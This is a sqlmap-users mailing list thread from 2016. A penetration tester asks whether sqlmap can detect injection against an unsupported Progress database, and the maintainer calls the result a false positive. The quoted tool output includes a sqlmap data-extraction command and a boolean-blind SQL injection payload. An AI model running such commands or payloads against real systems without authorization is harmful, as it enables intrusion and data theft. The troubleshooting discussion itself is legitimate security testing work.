Re: [sqlmap-users] boolean based blind on progress db
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] boolean based blind on progress db
|
From: Miroslav S. <mir...@gm...> - 2016-08-01 11:00:24
|
Hi.
This looks like a false positive. Please rerun with --flush-session.
Kind regards
On Mon, Aug 1, 2016 at 12:57 PM, Niall <jam...@gm...> wrote:
> Hi,
>
> I am using SQLMAP to pen test a web app and it says that a field is
> boolean based blind vunerable.
>
> The DB is an OpenEdge Progress DB, so I understand SQLMAP does not support
> this DBMS. However, can I still use it to test whether there is a SQL
> injection vulnerability (and not exploit it) or will it not detect the
> vulnerability at all?
>
> I am not sure whether SQLMAP cannot get any info out of the DB because
> Progress is unsupported or it is a false-positive.
>
> Below is SQLMAP output (If I run the exact same query on the DB itself it
> returns data):
>
> sqlmap -u 'http://xxx/login?host=1' --sql-query="select ('role') from
> pub.role_type" --no-cast --threads=2
> _
> ___ ___| |_____ ___ ___ {1.0.7.1#dev}
> |_ -| . | | | .'| . |
> |___|_ |_|_|_|_|__,| _|
> |_| |_| http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> mutual consent is illegal. It is the end user's responsibility to obey all
> applicable local, state and federal laws. Developers assume no liability
> and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 11:53:57
>
> [11:53:57] [INFO] resuming back-end DBMS 'mysql'
> [11:53:57] [INFO] testing connection to the target URL
> [11:53:57] [CRITICAL] previous heuristics detected that the target is
> protected by some kind of WAF/IPS/IDS
> sqlmap resumed the following injection point(s) from stored session:
> ---
> Parameter: host (GET)
> Type: boolean-based blind
> Title: AND boolean-based blind - WHERE or HAVING clause
> Payload: host=1") AND 1239=1239 AND ("UqXp"="UqXp
> ---
> [11:53:57] [INFO] the back-end DBMS is MySQL
> back-end DBMS: MySQL 5 (MariaDB fork)
> [11:53:57] [INFO] fetching SQL SELECT statement query output: 'select
> ('role') from pub.role_type'
> [11:53:57] [INFO] retrieving the length of query output
> [11:53:57] [INFO] retrieved:
> [11:53:57] [INFO] retrieved:
> select ('role') from pub.role_type: None
> [11:53:58] [INFO] fetched data logged to text files under
> '/root/.sqlmap/output/'
>
> [*] shutting down at 11:53:58
>
>
> Thank you for your help.
>
>
>
> ------------------------------------------------------------------------------
>
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
--
Miroslav Stampar
http://about.me/stamparm
|
